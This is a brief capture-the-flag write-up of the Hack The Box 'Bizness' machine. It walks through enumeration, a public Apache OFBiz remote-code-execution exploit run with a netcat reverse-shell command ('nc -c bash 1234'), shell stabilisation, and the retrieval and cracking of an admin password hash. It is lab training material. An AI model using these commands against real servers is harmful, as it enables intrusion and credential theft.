HTB Bizness Writeup

2 minute read


A writeup of the Hack The Box machine “Bizness” with easy difficulty

Welcome to this writeup of the Bizness HackTheBox machine to help you pwn and follow my thoughts.


First, I check the open ports with Nmap –sV –sC

Port 22, 80 and 443 are open. Port 80 is a running a webserver named bizness.htb

I have to add this url to the IP in the /etc/hosts file > bizness.htb Or with 1 command> echo " bizness.htb" | sudo tee -a /etc/hosts

Now we can access the webpage after we accepted the self-signed certificate risk warning.

There seems to be no clue on the webpage itself apart from that the site is powered by Apache OFBiz. We we dive deeper into this later.

There are also input fields. Send a message to contact or subscribe to their newsletter.

First I am going to see if what url directories there are >

There seems to be no other directories found by gobuster.

I tried dirsearch next > dirsearch -u https://bizness.htb

The /control/login directory appears here. It’s the Apache OFBiz login page!

User flag

After searching the internet, I found this exploit:

Clone the repository and go to the newly downloaded folder >

Run the command > python3 --url https://bizness.htb --cmd 'nc -c bash 1234'

But before you run the command. Setup a Netcat listener on port 1234 > Now I was able to get RCE >

We can obtain the user flag now >

Root flag

First, stabilize the shell with the following commands >

python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+z 
stty raw -echo; fg
export TERM=xterm

Somewhere in the file system is a hash to be found but where…..

In the /opt/ofbiz/framework/resources/templates directory is a file called AdminUserLoginData.xml where a hash can be found >

In another file is a salted hash to be found >

I tried to crack the hash with john but not successful.

Then I found a tool called: Apache-OFBiz-SHA1-Cracker. >—–b5bed59a7598——————————–

With the password cracked we can login to the root user to obtain the root.txt flag.


Finding the hash in a file is definitely the hardest part, as there are so many files on the system.

Thank you for reading! I hope you found it useful :)

Happy Hacking!